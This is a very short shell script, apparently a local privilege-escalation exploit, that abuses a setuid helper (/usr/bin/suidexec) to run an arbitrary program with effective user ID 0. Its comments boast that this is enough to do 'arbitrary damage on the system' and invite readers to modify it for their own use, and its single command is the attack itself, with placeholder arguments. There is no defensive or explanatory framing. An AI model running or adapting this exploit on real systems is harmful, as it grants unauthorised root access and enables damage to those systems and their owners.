#!/bin/sh
#
# This will happily execute your program with euid = 0. This
# is completely sufficient for doing arbitrary damage on the
# system. Modify code for own usage.

/usr/bin/suidexec <your program> /path/to/script

